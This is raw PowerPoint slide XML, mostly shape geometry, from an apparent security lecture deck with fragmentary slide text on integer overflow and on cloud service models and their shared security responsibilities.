                <a:lnTo>
                  <a:pt x="6004179" y="2428402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5966637" y="2455290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5926174" y="2477995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5883105" y="2496204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5837746" y="2509600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5790411" y="2517869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5741416" y="2520696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="420116" y="2520696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371120" y="2517869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323785" y="2509600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278426" y="2496204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235357" y="2477995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194894" y="2455290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157352" y="2428402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123047" y="2397648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92293" y="2363343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65405" y="2325801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42700" y="2285338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24491" y="2242269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11095" y="2196910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2826" y="2149575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2100579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="420115"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="0075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578977" y="4885842"/>
            <a:ext cx="5506720" cy="155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40005" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="114199"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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causes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application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calculate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values </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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out-of-bounds.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="113599"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1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used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cause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crash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4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used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in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buffer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overflow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attacks.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328404" y="3678935"/>
            <a:ext cx="4411980" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4411980" h="984885">
                <a:moveTo>
                  <a:pt x="4247896" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164084" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164084" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4247896" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4291535" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4330737" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4363942" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4389590" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4406122" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="164084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4406122" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4389590" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4363942" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4330737" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4291535" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4247896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0431271" y="3975608"/>
            <a:ext cx="220599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Integer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dirty="0" sz="2200" spc="-1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rflow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176" y="306451"/>
            <a:ext cx="37877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35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anything</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="190">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="195">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Service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80303" y="760476"/>
            <a:ext cx="5256276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830448" y="1882292"/>
            <a:ext cx="10594975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051300" marR="5080" indent="-4039235">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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IaaS,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PaaS,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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>SaaS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provide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specific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solutions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business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needs.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key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security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considerations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are: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02242" y="6192672"/>
            <a:ext cx="3263265" cy="1046480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="187960" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="156845">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="60" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-90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0" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-110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80" b="1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105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 b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>cloud: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gs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manage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by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10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Ps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45840" y="6192672"/>
            <a:ext cx="3930015" cy="1428115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="187960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1480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="60" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-85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 b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-100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75" b="1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200" spc="-100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200" spc="30" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>cloud:</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="1270">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1380"/>
              </a:spcBef>
            </a:pP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gs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wh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c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endParaRPr sz="2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responsibilities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must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be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taken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027141" y="3585217"/>
            <a:ext cx="3219450" cy="2414270"/>
            <a:chOff x="4027141" y="3585217"/>
            <a:chExt cx="3219450" cy="2414270"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4027141" y="3585217"/>
              <a:ext cx="3219450" cy="2101215"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3219450" h="2101215">
                  <a:moveTo>
                    <a:pt x="1973587" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1927955" y="1771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1883306" y="9152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1840316" y="21941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1799660" y="39940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1762014" y="62947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1728052" y="90761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1698452" y="123183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1673888" y="160012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1652710" y="142730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1606451" y="112596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1536146" y="81447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1489573" y="68516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1442345" y="60885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394964" y="58417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1347936" y="60975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1301763" y="68423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256951" y="80624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1214002" y="97441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1173422" y="118739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1135713" y="144379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1101380" y="174225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1070926" y="208142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1044857" y="245991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002283" y="226204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="958049" y="210202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912465" y="198039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="865847" y="189768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="818506" y="185442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="770757" y="185116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="722912" y="188841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672336" y="197285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623908" y="209972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577845" y="226648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="534362" y="247063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493677" y="270963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456005" y="298096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421564" y="328210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390568" y="361053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363236" y="396373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339782" y="433917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320424" y="473432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="305377" y="514668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294859" y="557371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289085" y="601289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288272" y="646170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292636" y="691761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289969" y="698238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239732" y="706460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192155" y="721428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148014" y="742688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108086" y="769791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73145" y="802284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43970" y="839716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21104" y="882062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6527" y="925955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="970582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283" y="1015127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10140" y="1058775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26331" y="1100713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49617" y="1140126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79761" y="1176199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116524" y="1208118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159667" y="1235067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124650" y="1274679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98199" y="1318576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80708" y="1365680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72575" y="1414911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74196" y="1465191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83297" y="1507065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98800" y="1546319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120146" y="1582564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146778" y="1615410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178138" y="1644467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213669" y="1669346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252813" y="1689656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295013" y="1705008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339710" y="1715011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386347" y="1719276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434368" y="1717413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440464" y="1726684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467827" y="1763612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498102" y="1797761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="531054" y="1829076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566444" y="1857506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604037" y="1882998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643595" y="1905499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684883" y="1924956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="727662" y="1941316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771697" y="1954528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="816750" y="1964537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="862585" y="1971291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="908966" y="1974737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955655" y="1974824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002415" y="1971497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049011" y="1964704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1095204" y="1954392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140759" y="1940509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1185439" y="1923002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1229007" y="1901817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1258599" y="1937358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1291774" y="1969937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1328244" y="1999362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1367720" y="2025439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1409913" y="2047975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1454534" y="2066776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1501295" y="2081649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1551211" y="2092719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1601166" y="2099120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1650845" y="2101002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1699931" y="2098516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1748109" y="2091813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1795063" y="2081042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1840479" y="2066354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1884041" y="2047899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1925432" y="2025828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1964339" y="2000290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2000444" y="1971436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033433" y="1939417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2062989" y="1904383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2088799" y="1866483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2110545" y="1825870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2127913" y="1782691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2169540" y="1803065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2213222" y="1819160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258544" y="1830871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2305091" y="1838096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2352449" y="1840730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2402700" y="1838507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451292" y="1831320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2497900" y="1819453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2542198" y="1803191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2583861" y="1782818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2622563" y="1758618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2657979" y="1730875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2689783" y="1699875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2717650" y="1665901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2741254" y="1629238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2760270" y="1590170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2774372" y="1548982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2783236" y="1505958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2786535" y="1461381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2837421" y="1452519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2886814" y="1439127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2934347" y="1421340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2979656" y="1399291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3022374" y="1373116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3061674" y="1343372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3096725" y="1310881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3127480" y="1275960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3153892" y="1238925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3175914" y="1200092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3193500" y="1159777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3206603" y="1118297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3215175" y="1075968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3219172" y="1033106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3218545" y="990028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3213249" y="947049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3203235" y="904486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3188459" y="862656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3168873" y="821874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144430" y="782456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3115084" y="744720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3120297" y="733314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3143354" y="654710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3147247" y="611380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3145183" y="568656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3137426" y="526944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3124238" y="486651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3105879" y="448183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082612" y="411946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3054699" y="378348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3022402" y="347794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2985982" y="320690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2945702" y="297445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2901823" y="278463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2854607" y="264152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2842353" y="221161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2823661" y="180340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2798892" y="142244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2768405" y="107428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2732560" y="76446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2692984" y="50563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2650860" y="30097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2606796" y="15004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2561396" y="5242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2515269" y="765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2469019" y="1532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2423253" y="7498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2378578" y="18619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2335599" y="34852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2294924" y="56153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2257158" y="82478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2222909" y="113784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2198761" y="88674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141845" y="46740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2065097" y="14086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2019526" y="4038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1973587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86832" y="5753480"/>
              <a:ext cx="233299" cy="24574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917693" y="5520308"/>
              <a:ext cx="350520" cy="350520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="350520" h="350520">
                  <a:moveTo>
                    <a:pt x="175005" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="128484" y="6251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86679" y="23894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51260" y="51260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23894" y="86679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6251" y="128484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="175005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6251" y="221527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23894" y="263332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51260" y="298751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86679" y="326117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128484" y="343760"/>
